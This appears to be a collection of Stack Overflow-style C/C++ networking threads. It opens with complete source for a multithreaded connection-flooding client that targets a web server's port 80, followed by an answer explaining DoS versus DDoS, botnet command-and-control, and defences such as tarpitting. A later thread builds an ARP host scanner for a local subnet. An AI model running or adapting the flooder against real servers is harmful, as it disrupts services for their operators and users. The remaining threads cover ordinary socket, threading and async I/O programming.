Can we say that this is a simple DDoS botnet? [closed] - c++

This is a client program based on POSIX sockets and threads. The program creates multiple threads and is intended to tie up the server. Can we say that this is a simple DDoS botnet? The code is in C/C++ and targets POSIX platforms.
Here's the code
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

int get_hostname_by_ip(char* h, char* ip)
{
    struct hostent *he;
    struct in_addr **addr_list;
    int i;
    if ((he = gethostbyname(h)) == NULL)
    {
        perror("gethostbyname");
        return 1;
    }
    addr_list = (struct in_addr **) he->h_addr_list;
    for (i = 0; addr_list[i] != NULL; i++)
    {
        strcpy(ip, inet_ntoa(*addr_list[i]));
        return 0;
    }
    return 1;
}
void client(char* h)
{
    int fd;
    char* ip = new char[20];
    int port = 80;
    struct sockaddr_in addr;
    char ch[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
    while (1)
    {
        fd = socket(AF_INET, SOCK_STREAM, 0);
        addr.sin_family = AF_INET;
        get_hostname_by_ip(h, ip);
        addr.sin_addr.s_addr = inet_addr(ip);
        addr.sin_port = htons(port);
        if (connect(fd, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        {
            perror("error: can't connect to server\n");
            return;
        }
        if (send(fd, ch, sizeof(ch), 0) < 0)
        {
            perror("error: can't send\n");
        }
        close(fd);
    }
}
struct info
{
    char* h;
    int c;
};

void* thread_entry_point(void* i)
{
    info* in = (info*)i;
    client(in->h);
    return NULL; /* a pthread entry point must return a value */
}
int main(int argc, char** argv)
{
    int s = atoi(argv[2]);
    pthread_t t[s];
    info in = {argv[1], s};
    for (int i = 0; i < s; ++i)
    {
        pthread_create(&t[i], NULL, thread_entry_point, (void*)&in);
    }
    pthread_join(t[0], NULL);
    return 0;
}

No: the first "D" in "DDoS" stands for "Distributed". A single process on a single machine constitutes a simple DoS (and from that one machine's point of view it can be contained with mechanisms such as Unix's ulimit; from the victim's point of view, just excluding the offending IP at the firewall level is often enough -- see below).
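As an illustration of that containment on the offending machine, here is a minimal sketch using setrlimit, the programmatic counterpart of ulimit (the limit of 64 descriptors is just an example): a process capped this way cannot hold more than a handful of sockets open at once.
#include <stdio.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;
    rl.rlim_cur = 64;   /* soft limit: at most 64 open descriptors */
    rl.rlim_max = 64;   /* hard limit */
    if (setrlimit(RLIMIT_NOFILE, &rl) != 0)
    {
        perror("setrlimit");
        return 1;
    }
    /* From here on, socket()/open() calls beyond the limit fail with EMFILE. */
    return 0;
}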
For a DDoS you would need some form of command-and-control allowing the process on machine A to lay dormant there, with as little disruption as possible to avoid detection, and then receive from machine B the order to attack machine C. It is the disruptive traffic routed towards C by many instances of A's that would then constitute/cause the actual denial of service against C.
Your code could well be part of a DDoS bot, with the C&C part receiving an instance of info. It would also be a good learning tool, although for real "black hat" purposes it wouldn't be very useful.
This would be much more on topic on security.stackexchange.com.
Resource ratio
In your example we have a ratio of 1:1, i.e., you open one socket, the victim has to allocate one socket. This has the advantage of simplicity (vanilla socket programming is all that's required). On the other hand, it is an attrition war - you must be sure to exhaust the victim's actual resources well before you exhaust your own. Otherwise, you need to upscale the attack recruiting more bots.
However, it turns out that once the victim has fingerprinted the attack, which is not difficult to do, there are several strategies it can employ to thwart it and turn the ratio to its advantage. One such example is TARPIT: by tarpitting hostile connections, a victim can bring a whole network of attackers to its collective knees. There are also strategies that fake the initial connection, so that an attacker using the vanilla approach has to waste a socket and its bookkeeping structures while the defender does almost nothing beyond the initial setup. While the resource ratio does not go to infinity, it skyrockets in the defender's favour.


Threads and sockets, threads and objects more generally

Thanks for your time.
What am I trying to accomplish?
I'm trying to utilise threads to speed up my program. After some profiling I found that a large portion of my program's time (it's a graphics application) is spent checking the status of my socket. That's obviously not ideal when trying to trim the fat and get down to <16 ms per cycle. I'm currently using the select function to check for new data, and reading if data is available.
What's the problem?
I can't get my head around threads and objects. I had a play with some textbook examples, running and joining local functions with threads, which worked fine. Trying to move this into my own code has proved beyond me.
What have I tried?
I've tried looking into smart pointers to allocate my UDPSocket objects on the heap, in the hope that heap memory is accessible by all threads. I've tried good old new and delete for the same reason. I've tried wrapping my UDPSockets inside another object and launching the whole lot on another thread.
In summary, it's clear that I have a big hole in my understanding of threads. I would be grateful for a solution to this specific problem, but also for links to any good articles, tutorials, videos etc. that might help further my understanding. Perhaps I simply need to re-examine my whole UDPSocket class? Your advice is most welcome.
I'll post my example below; please note I've stripped out all error checking etc. for readability.
#pragma once
#define WIN32_LEAN_AND_MEAN
#include <WS2tcpip.h>
#include <iostream>
#include <memory>
#include <string>
#include <thread>
#pragma comment(lib, "ws2_32.lib")

class UDPServer
{
public:
    UDPServer(unsigned short port_in)
        :
        port(port_in)
    {
        // Startup Winsock
        WSADATA data;
        WORD version = MAKEWORD(2, 2);
        int wsOk = WSAStartup(version, &data);
        // Bind socket to port, any address
        s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        // Hint structure
        sockaddr_in serverHint;
        serverHint.sin_addr.S_un.S_addr = ADDR_ANY;
        serverHint.sin_family = AF_INET;
        serverHint.sin_port = htons(port);
        bind(s, (sockaddr*)&serverHint, sizeof(serverHint));
    }
    ~UDPServer()
    {
        closesocket(s);
        WSACleanup();
    }
    bool Recieve()
    {
        ZeroMemory(&client, clientLength);
        if (dataAvailable(s))
        {
            ZeroMemory(messageBuffer, bufferSize);
            int bytesIn = recvfrom(s, messageBuffer, bufferSize, 0, (sockaddr*)&client, &clientLength);
            char clientIP[bufferSize];
            ZeroMemory(clientIP, bufferSize);
            inet_ntop(AF_INET, &client.sin_addr, clientIP, 256);
            return true;
        }
        return false;
    }
    std::string GetNetworkMessage()
    {
        std::string message = messageBuffer;
        return message;
    }
private:
    bool dataAvailable(int sock, int interval = 6000)
    {
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(sock, &fds);
        timeval tv;
        tv.tv_sec = 0;
        tv.tv_usec = interval;
        return (select(sock + 1, &fds, 0, 0, &tv) == 1);
    }
private:
    SOCKET s;
    sockaddr_in client;
    int clientLength = sizeof(client);
    static constexpr int bufferSize = 512;
    unsigned short port;
    char messageBuffer[bufferSize] = {};
};
int main()
{
    // Create server object on the heap.
    std::unique_ptr<UDPServer> udp = std::make_unique<UDPServer>(6000);
    // Get some new threads mate.
    std::thread theThread;
    std::string oldString = "";
    while (true)
    {
        // Problems...
        theThread = std::thread{udp->Recieve()};
        if (udp->GetNetworkMessage() != oldString)
        {
            // print out any changed data we find.
            oldString = udp->GetNetworkMessage();
            std::cout << oldString << std::endl;
        }
    }
}
One of the items you weren't clear on is memory accessibility in threads. In Windows, and likely most other operating systems, any memory accessible in the main thread is also accessible by every other thread in the same process.
There are two issues with regard to threads and that memory. The first is how more than one thread can know where a given variable or object is in memory. This is generally solved by passing a pointer to the new thread when it is created; most thread creation mechanisms provide a parameter for this. So this is the easier issue to solve.
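A minimal sketch of that first point using std::thread (the names are illustrative, not taken from the question's code):
#include <iostream>
#include <string>
#include <thread>

struct SharedState
{
    std::string lastMessage;
};

// The worker thread is handed a pointer to the object it should work on.
void receiverLoop(SharedState* state)
{
    state->lastMessage = "hello from the worker thread";
}

int main()
{
    SharedState state;                         // owned by the main thread
    std::thread worker(receiverLoop, &state);  // pass its address to the new thread
    worker.join();                             // safe to read after joining
    std::cout << state.lastMessage << std::endl;
}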
The harder issue to solve is making sure that one thread doesn't change a variable or object while another thread is using it. Generally this is solved with a mutual exclusion synchronization object, usually referred to as a mutex or a lock. I suggest learning about the concept of a mutex, but the bottom line is that it allows only one thread at a time to access whatever is locked by that mutex. If one thread is busy changing or using the object, the other thread waits until the object has been unlocked before continuing.
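A minimal sketch of a mutex protecting shared data (again, illustrative names, not the asker's class):
#include <mutex>
#include <string>
#include <thread>

std::mutex messageMutex;
std::string sharedMessage;

void writer()
{
    std::lock_guard<std::mutex> lock(messageMutex); // blocks if the reader holds the mutex
    sharedMessage = "new data";
}

void reader()
{
    std::lock_guard<std::mutex> lock(messageMutex); // blocks if the writer holds the mutex
    std::string copy = sharedMessage;               // safe: we hold the lock
    (void)copy;
}

int main()
{
    std::thread a(writer), b(reader);
    a.join();
    b.join();
}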
But when you get into multiple locks, there is something called a deadlock. A simple example: thread A holds lock 1 and is waiting to acquire lock 2, while thread B holds lock 2 and is waiting for lock 1. Both threads are stuck waiting on the other. The solution is that any time you have to hold two locks, always take them in the same order. In this case, if both threads always took lock 1 and then lock 2, they couldn't deadlock.
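A sketch of that ordering rule; C++17's std::scoped_lock can also acquire several mutexes in one call with a built-in deadlock-avoidance algorithm, which gives the same guarantee:
#include <mutex>
#include <thread>

std::mutex lock1;
std::mutex lock2;

void threadA()
{
    std::scoped_lock guard(lock1, lock2); // both locks, deadlock-free acquisition
    // ... use the data protected by both locks ...
}

void threadB()
{
    std::scoped_lock guard(lock1, lock2); // same order / same call: no deadlock
    // ...
}

int main()
{
    std::thread a(threadA);
    std::thread b(threadB);
    a.join();
    b.join();
}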
The subject matter you want to learn about is threads and thread synchronization.

Why are Go sockets slower than C++ sockets? [closed]

I benchmarked a simple socket ping pong test in Go and C++. The client begins by sending 0 to the server. The server increments whatever number it gets and sends it back to the client. The client echos the number back to the server, and stops once the number is 1,000,000.
Both the client and the server are on the same computer, so I use a Unix socket in both cases. (I also tried same-host TCP sockets, which showed a similar result).
The Go test takes 14 seconds, whereas the C++ test takes 8 seconds. This is surprising to me because I have run a fair number of Go vs. C++ benchmarks, and generally Go is as performant as C++ as long as I don't trigger the garbage collector.
I am on a Mac, though commenters have also reported that the Go version is slower on Linux.
I'm wondering whether I'm missing a way to optimize the Go program, or whether there are just inefficiencies under the hood.
Below are the commands I run to carry out the test, along with the test results. All code files are pasted at the bottom of this question.
Run Go server:
$ rm /tmp/go.sock
$ go run socketUnixServer.go
Run Go client:
$ go build socketUnixClient.go; time ./socketUnixClient
real 0m14.101s
user 0m5.242s
sys 0m7.883s
Run C++ server:
$ rm /tmp/cpp.sock
$ clang++ -std=c++11 tcpServerIncUnix.cpp -O3; ./a.out
Run C++ client:
$ clang++ -std=c++11 tcpClientIncUnix.cpp -O3; time ./a.out
real 0m8.690s
user 0m0.835s
sys 0m3.800s
Code files
Go server:
// socketUnixServer.go
package main

import (
    "log"
    "net"
    "encoding/binary"
)

func main() {
    ln, err := net.Listen("unix", "/tmp/go.sock")
    if err != nil {
        log.Fatal("Listen error: ", err)
    }
    c, err := ln.Accept()
    if err != nil {
        panic(err)
    }
    log.Println("Connected with client!")

    readbuf := make([]byte, 4)
    writebuf := make([]byte, 4)
    for {
        c.Read(readbuf)
        clientNum := binary.BigEndian.Uint32(readbuf)
        binary.BigEndian.PutUint32(writebuf, clientNum+1)
        c.Write(writebuf)
    }
}
Go client:
// socketUnixClient.go
package main

import (
    "log"
    "net"
    "encoding/binary"
)

const N = 1000000

func main() {
    c, err := net.Dial("unix", "/tmp/go.sock")
    if err != nil {
        log.Fatal("Dial error", err)
    }
    defer c.Close()

    readbuf := make([]byte, 4)
    writebuf := make([]byte, 4)
    var currNumber uint32 = 0
    for currNumber < N {
        binary.BigEndian.PutUint32(writebuf, currNumber)
        c.Write(writebuf)
        // Read the incremented number from server
        c.Read(readbuf[:])
        currNumber = binary.BigEndian.Uint32(readbuf)
    }
}
C++ server:
// tcpServerIncUnix.cpp
// Server side C/C++ program to demonstrate socket programming
// #include <iostream>
#include <unistd.h>
#include <stdio.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <string.h>

// Big Endian (network order)
unsigned int fromBytes(unsigned char b[4]) {
    return b[3] | b[2]<<8 | b[1]<<16 | b[0]<<24;
}

void toBytes(unsigned int x, unsigned char (&b)[4]) {
    b[3] = x;
    b[2] = x>>8;
    b[1] = x>>16;
    b[0] = x>>24;
}

int main(int argc, char const *argv[])
{
    int server_fd, new_socket, valread;
    struct sockaddr_un saddr;
    int saddrlen = sizeof(saddr);
    unsigned char recv_buffer[4] = {0};
    unsigned char send_buffer[4] = {0};

    server_fd = socket(AF_UNIX, SOCK_STREAM, 0);
    saddr.sun_family = AF_UNIX;
    strncpy(saddr.sun_path, "/tmp/cpp.sock", sizeof(saddr.sun_path));
    saddr.sun_path[sizeof(saddr.sun_path)-1] = '\0';
    bind(server_fd, (struct sockaddr *)&saddr, sizeof(saddr));
    listen(server_fd, 3);

    // Accept one client connection
    new_socket = accept(server_fd, (struct sockaddr *)&saddr, (socklen_t*)&saddrlen);
    printf("Connected with client!\n");
    // Note: if /tmp/cpp.sock already exists, you'll get the "Connected with client!"
    // message before running the client. Delete this file first.
    unsigned int x = 0;
    while (true) {
        valread = read(new_socket, recv_buffer, 4);
        x = fromBytes(recv_buffer);
        toBytes(x+1, send_buffer);
        write(new_socket, send_buffer, 4);
    }
}
C++ client:
// tcpClientIncUnix.cpp
// Client side C/C++ program to demonstrate socket programming
// #include <iostream>
#include <unistd.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <string.h>

// Big Endian (network order)
unsigned int fromBytes(unsigned char b[4]) {
    return b[3] | b[2]<<8 | b[1]<<16 | b[0]<<24;
}

void toBytes(unsigned int x, unsigned char (&b)[4]) {
    b[3] = x;
    b[2] = x>>8;
    b[1] = x>>16;
    b[0] = x>>24;
}

int main(int argc, char const *argv[])
{
    int sock, valread;
    struct sockaddr_un saddr;
    int opt = 1;
    int saddrlen = sizeof(saddr);
    // We'll be passing uint32's back and forth
    unsigned char recv_buffer[4] = {0};
    unsigned char send_buffer[4] = {0};

    sock = socket(AF_UNIX, SOCK_STREAM, 0);
    saddr.sun_family = AF_UNIX;
    strncpy(saddr.sun_path, "/tmp/cpp.sock", sizeof(saddr.sun_path));
    saddr.sun_path[sizeof(saddr.sun_path)-1] = '\0';

    // Connect to the server
    if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) != 0) {
        throw("connect failed");
    }

    int n = 1000000;
    unsigned int currNumber = 0;
    while (currNumber < n) {
        toBytes(currNumber, send_buffer);
        write(sock, send_buffer, 4);
        // Read the incremented number from server
        valread = read(sock, recv_buffer, 4);
        currNumber = fromBytes(recv_buffer);
    }
}
First of all, I confirm that the Go programs from this question do run noticeably slower than the C++ ones. I think that it's indeed interesting to know why.
I profiled the Go client and server with pprof and found out that syscall.Syscall takes 70% of the total execution time. According to this ticket, syscalls in Go are approximately 1.4 times slower than in C.
(pprof) top -cum
Showing nodes accounting for 18.78s, 67.97% of 27.63s total
Dropped 44 nodes (cum <= 0.14s)
Showing top 10 nodes out of 44
flat flat% sum% cum cum%
0.11s 0.4% 0.4% 22.65s 81.98% main.main
0 0% 0.4% 22.65s 81.98% runtime.main
18.14s 65.65% 66.05% 19.91s 72.06% syscall.Syscall
0.03s 0.11% 66.16% 12.91s 46.72% net.(*conn).Read
0.10s 0.36% 66.52% 12.88s 46.62% net.(*netFD).Read
0.16s 0.58% 67.10% 12.78s 46.25% internal/poll.(*FD).Read
0.06s 0.22% 67.32% 11.87s 42.96% syscall.Read
0.11s 0.4% 67.72% 11.81s 42.74% syscall.read
0.02s 0.072% 67.79% 9.30s 33.66% net.(*conn).Write
0.05s 0.18% 67.97% 9.28s 33.59% net.(*netFD).Write
I gradually decreased the number of Conn.Write and Conn.Read calls and increased the size of the buffer accordingly, so that the number of transferred bytes stayed the same. The result: the fewer of these calls the program makes, the closer its performance gets to the C++ version.

Any way to change the behavior of synchronous Windows API SendARP?

I'm writing a local network scanner on Windows to find online hosts with the IP Helper Functions, which is equivalent to nmap -PR but without WinPcap. I know SendARP will block and send the ARP request 3 times if the remote host doesn't respond, so I use std::async to create one thread for each host, but the problem is that I want to send an ARP request every 20 ms so there aren't too many ARP packets in a very short time.
#include <iostream>
#include <future>
#include <vector>
#include <winsock2.h>
#include <iphlpapi.h>
#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")

using namespace std;

int main(int argc, char **argv)
{
    ULONG MacAddr[2];       /* for 6-byte hardware addresses */
    ULONG PhysAddrLen = 6;  /* default to length of six bytes */
    memset(&MacAddr, 0xff, sizeof (MacAddr));
    PhysAddrLen = 6;
    IPAddr SrcIp = 0;
    IPAddr DestIp = 0;
    char buf[64] = {0};
    size_t start = time(NULL);
    std::vector<std::future<DWORD> > vResults;
    for (auto i = 1; i < 255; i++)
    {
        sprintf(buf, "192.168.1.%d", i);
        DestIp = inet_addr(buf);
        vResults.push_back(std::async(std::launch::async, std::ref(SendARP), DestIp, SrcIp, MacAddr, &PhysAddrLen));
        Sleep(20);
    }
    for (auto it = vResults.begin(); it != vResults.end(); ++it)
    {
        if (it->get() == NO_ERROR)
        {
            std::cout << "host up\n";
        }
    }
    std::cout << "time elapsed " << (time(NULL) - start) << std::endl;
    return 0;
}
At first I could do this by calling Sleep(20) after launching each thread, but once SendARP in those threads re-sends ARP requests because there is no reply from the remote host, it's out of my control, and I see many requests within a very short time (<10 ms) in Wireshark. So my questions are:
Is there any way to make SendARP asynchronous?
If not, can I control the timing of the ARP requests that SendARP sends from those threads?
There doesn't seem to be any way to force SendARP to act in a non-blocking manner; it would appear that when a host is unreachable, it will try to re-query several times before giving up.
As for the solution, it's nothing you want to hear. The MSDN docs state that there's a newer API, ResolveIpNetEntry2, that deprecates SendARP and can do the same thing, but it also appears to behave in the same manner.
The struct it receives contains a field called ReachabilityTime.LastUnreachable which is: The time, in milliseconds, that a node assumes a neighbor is unreachable after not having received a reachability confirmation.
However, it does not appear to have any real effect.
The best way to do it is to use WinPcap or some other driver; there doesn't seem to be a way of solving your problem in userland.

Cross platform , C/C++ HTTP library with asynchronous capability [closed]

I'm looking for a C/C++ library that will work on Windows and Linux and will allow me to asynchronously query multiple web servers (thousands per minute) for page headers and download web pages, in much the same way the WinHttp library does in a Windows environment.
So far I've come across libcurl, which seems to do what I want, but the asynchronous aspect looks suspect.
How easy do you think it would be to bypass the idea of using a library and write something simple from scratch based on sockets that could achieve this?
Any comments, advice or suggestions would be very welcomed.
Addendum: does anybody have comments about doing this with libcurl? I said the asynchronous aspect looks suspect, but does anyone have any experience of it?
Try libevent HTTP routines. You create an HTTP connection and provide a callback which is invoked when a response arrives (or timeout event fires).
Updated: I built a distributed HTTP connection-throttling proxy and used both the client and server portions within the same daemon, all on a single thread. It worked great.
If you're writing an HTTP client, libevent should be a good fit. The only limitation I ran into with the server side was a lack of configuration options -- the API is a bit sparse if you want to start adding more advanced features, which I expected since it was never intended to replace general-purpose web servers like Apache or Nginx. For example, I patched it to add a custom subroutine to limit the overall size of an inbound HTTP request (e.g. close the connection after 10 MB read). The code is very well written and the patch was easy to implement.
I was using the 1.3.x branch; the 2.x branch has some serious performance improvements over the older releases.
Code example: Found a few minutes and wrote a quick example. This should get you acquainted with the libevent programming style:
#include <stdio.h>
#include <event.h>
#include <evhttp.h>

void
_reqhandler(struct evhttp_request *req, void *state)
{
    printf("in _reqhandler. state == %s\n", (char *) state);
    if (req == NULL) {
        printf("timed out!\n");
    } else if (req->response_code == 0) {
        printf("connection refused!\n");
    } else if (req->response_code != 200) {
        printf("error: %u %s\n", req->response_code, req->response_code_line);
    } else {
        printf("success: %u %s\n", req->response_code, req->response_code_line);
    }
    event_loopexit(NULL);
}

int
main(int argc, char *argv[])
{
    const char *state = "misc. state you can pass as argument to your handler";
    const char *addr = "127.0.0.1";
    unsigned int port = 80;
    struct evhttp_connection *conn;
    struct evhttp_request *req;

    printf("initializing libevent subsystem..\n");
    event_init();

    conn = evhttp_connection_new(addr, port);
    evhttp_connection_set_timeout(conn, 5);

    req = evhttp_request_new(_reqhandler, (void *)state);
    evhttp_add_header(req->output_headers, "Host", addr);
    evhttp_add_header(req->output_headers, "Content-Length", "0");
    evhttp_make_request(conn, req, EVHTTP_REQ_GET, "/");

    printf("starting event loop..\n");
    event_dispatch();
    return 0;
}
Compile and run:
% gcc -o foo foo.c -levent
% ./foo
initializing libevent subsystem..
starting event loop..
in _reqhandler. state == misc. state you can pass as argument to your handler
success: 200 OK
Microsoft's cpprestsdk is a cross-platform HTTP library that enables communication with HTTP servers. There is some sample code on MSDN. It uses Boost.Asio on Linux and WinHTTP on Windows.
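To give a feel for the style, here is a minimal sketch of an asynchronous GET with cpprestsdk's http_client (the URL is a placeholder and error handling is omitted):
#include <cpprest/http_client.h>
#include <iostream>

using namespace web::http;
using namespace web::http::client;

int main()
{
    http_client client(U("http://www.example.com"));   // placeholder URL

    // request() returns a task; the continuations run when the response arrives.
    client.request(methods::GET, U("/"))
        .then([](http_response response)
        {
            std::wcout << L"Status: " << response.status_code() << std::endl;
            return response.extract_string();
        })
        .then([](utility::string_t body)
        {
            std::wcout << body << std::endl;
        })
        .wait();   // block here only for the sake of the example
    return 0;
}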
Try https://github.com/ithewei/libhv
libhv is a cross-platform lightweight network library for developing TCP/UDP/SSL/HTTP/WebSocket client/server.
HTTP client example:
auto resp = requests::get("http://127.0.0.1:8080/ping");
if (resp == NULL) {
    printf("request failed!\n");
} else {
    printf("%d %s\r\n", resp->status_code, resp->status_message());
    printf("%s\n", resp->body.c_str());
}

hv::Json jroot;
jroot["user"] = "admin";
jroot["pswd"] = "123456";
http_headers headers;
headers["Content-Type"] = "application/json";
resp = requests::post("127.0.0.1:8080/echo", jroot.dump(), headers);
if (resp == NULL) {
    printf("request failed!\n");
} else {
    printf("%d %s\r\n", resp->status_code, resp->status_message());
    printf("%s\n", resp->body.c_str());
}

// async
int finished = 0;
Request req(new HttpRequest);
req->url = "http://127.0.0.1:8080/echo";
req->method = HTTP_POST;
req->body = "This is an async request.";
req->timeout = 10;
requests::async(req, [&finished](const HttpResponsePtr& resp) {
    if (resp == NULL) {
        printf("request failed!\n");
    } else {
        printf("%d %s\r\n", resp->status_code, resp->status_message());
        printf("%s\n", resp->body.c_str());
    }
    finished = 1;
});
For more usage, see https://github.com/ithewei/libhv/blob/master/examples/http_client_test.cpp

AIO on OS X vs Linux - why it doesn't work on Mac OS X 10.6

My question is really simple: why does the code below work on Linux, but not on Mac OS X 10.6.2 Snow Leopard?
To compile, save the file as aio.cc and build with g++ aio.cc -o aio -lrt on Linux, or g++ aio.cc -o aio on Mac OS X. I'm using Mac OS X 10.6.2 for testing on a Mac and Linux kernel 2.6 for testing on Linux.
The failure I see on OS X is that aio_write fails with -1 and sets errno to EAGAIN, which simply means "Resource temporarily unavailable". Why is that?
extern "C" {
#include <aio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <errno.h>
#include <signal.h>
}
#include <cassert>
#include <string>
#include <iostream>
using namespace std;
static void
aio_completion_handler(int signo, siginfo_t *info, void *context)
{
using namespace std;
cout << "BLAH" << endl;
}
int main()
{
int err;
struct sockaddr_in sin;
memset(&sin, 0, sizeof(sin));
sin.sin_port = htons(1234);
sin.sin_addr.s_addr = inet_addr("127.0.0.1");
sin.sin_family = PF_INET;
int sd = ::socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sd == -1) {
assert(!"socket() failed");
}
const struct sockaddr *saddr = reinterpret_cast<const struct sockaddr *>(&sin);
err = ::connect(sd, saddr, sizeof(struct sockaddr));
if (err == -1) {
perror(NULL);
assert(!"connect() failed");
}
struct aiocb *aio = new aiocb();
memset(aio, 0, sizeof(struct aiocb));
char *buf = new char[3];
buf[0] = 'a';
buf[1] = 'b';
buf[2] = 'c';
aio->aio_fildes = sd;
aio->aio_buf = buf;
aio->aio_nbytes = 3;
aio->aio_sigevent.sigev_notify = SIGEV_SIGNAL;
aio->aio_sigevent.sigev_signo = SIGIO;
aio->aio_sigevent.sigev_value.sival_ptr = &aio;
struct sigaction sig_act;
sigemptyset(&sig_act.sa_mask);
sig_act.sa_flags = SA_SIGINFO;
sig_act.sa_sigaction = aio_completion_handler;
sigaction(SIGIO, &sig_act, NULL);
errno = 0;
int ret = aio_write(aio);
if (ret == -1) {
perror(NULL);
}
assert(ret != -1);
}
UPDATE (Feb 2010): OSX does not support AIO on sockets at all. Bummer!
The presented code was tested on Mountain Lion 10.8.2. It works with a small correction.
The line
aio->aio_fildes = sd;
should be changed, for example, to
aio->aio_fildes = open("/dev/null", O_RDWR);
to get the expected result. See the manual: "The aio_write() function allows the calling process to perform an asynchronous write to a previously opened file."
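For reference, a minimal sketch along those lines -- writing to a regular file and polling for completion instead of using a signal (the path is just an illustration):
#include <aio.h>
#include <cerrno>
#include <cstdio>
#include <cstring>
#include <fcntl.h>
#include <unistd.h>

int main()
{
    // Open a regular file; aio_write on sockets is the part OS X rejects.
    int fd = open("/tmp/aio_demo.txt", O_CREAT | O_WRONLY | O_TRUNC, 0644);
    if (fd == -1) { perror("open"); return 1; }

    const char data[] = "abc";
    struct aiocb cb;
    memset(&cb, 0, sizeof(cb));
    cb.aio_fildes = fd;
    cb.aio_buf = const_cast<char *>(data);
    cb.aio_nbytes = sizeof(data) - 1;

    if (aio_write(&cb) == -1) { perror("aio_write"); return 1; }

    // Poll until the request completes (a real program would use a signal
    // or aio_suspend instead of busy-waiting).
    while (aio_error(&cb) == EINPROGRESS)
        usleep(1000);

    printf("aio_write completed: %ld bytes\n", (long)aio_return(&cb));
    close(fd);
    return 0;
}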
I have code very similar to yours on 10.6.2 (but writing to a file) working without any problems - so it is possible to do what you're trying.
Just out of curiosity, what value are you using for the SIGIO constant? I found that an invalid value here on OS X would cause aio_write to fail, so I always pass SIGUSR1. Maybe check the return value of sigaction() to verify the signal details?
The points raised in your links all refer to a different method for raising I/O completion notifications (e.g. kqueue, which is a BSD-specific mechanism), but they don't really answer your question about POSIX methods for async I/O and whether they work on Darwin.
The UNIX world really is a mishmash of solutions for this, and it would be good if there were one tried and tested solution that worked across all platforms; alas, currently there isn't, with POSIX being the one that aims for the most consistency.
It's a bit of a stab in the dark, but it might also be useful to make your socket handle non-blocking (i.e. set the O_NONBLOCK file status flag) as well as using SIGUSR1.
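For completeness, making a descriptor non-blocking is done with fcntl rather than setsockopt -- roughly:
#include <fcntl.h>

/* Returns 0 on success, -1 on failure (a sketch; sd is the connected socket). */
static int make_nonblocking(int sd)
{
    int flags = fcntl(sd, F_GETFL, 0);
    if (flags == -1)
        return -1;
    return fcntl(sd, F_SETFL, flags | O_NONBLOCK);
}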
If I get some time I'll work with your socket sample and see if I can get anything out of that too.
Best of luck.
OS X allows you to use sockets via the (CF)RunLoop and to get callbacks from the run loop.
That is the most elegant way I have found to use async I/O on the Mac.
You can use your existing socket and do a CFSocketCreateWithNative, then register callbacks on your run loop.
Here is a small snippet of code that shows how it can be set up; it's incomplete since I have cut it down from a source file...
// This will setup a readCallback
void SocketClass::setupCFCallback() {
    CFSocketContext context = { 0, this, NULL, NULL, NULL };
    if (CFSocketRef macMulticastSocketRef = CFSocketCreateWithNative(NULL, socketHandle_, kCFSocketReadCallBack, readCallBack, &context)) {
        if (CFRunLoopSourceRef macRunLoopSrc = CFSocketCreateRunLoopSource(NULL, macMulticastSocketRef, 0)) {
            if (!CFRunLoopContainsSource(CFRunLoopGetCurrent(), macRunLoopSrc, kCFRunLoopDefaultMode)) {
                CFRunLoopAddSource(CFRunLoopGetCurrent(), macRunLoopSrc, kCFRunLoopDefaultMode);
                macRunLoopSrc_ = macRunLoopSrc;
            }
            else
                CFRelease(macRunLoopSrc);
        }
        else
            CFSocketInvalidate(macMulticastSocketRef);
        CFRelease(macMulticastSocketRef);
    }
}

void SocketClass::readCallBack(CFSocketRef inref, CFSocketCallBackType type, CFDataRef, const void *, void *info) {
    if (SocketClass* socket_ptr = reinterpret_cast<SocketClass*>(info))
        socket_ptr->receive(); // do stuff with your socket
}
}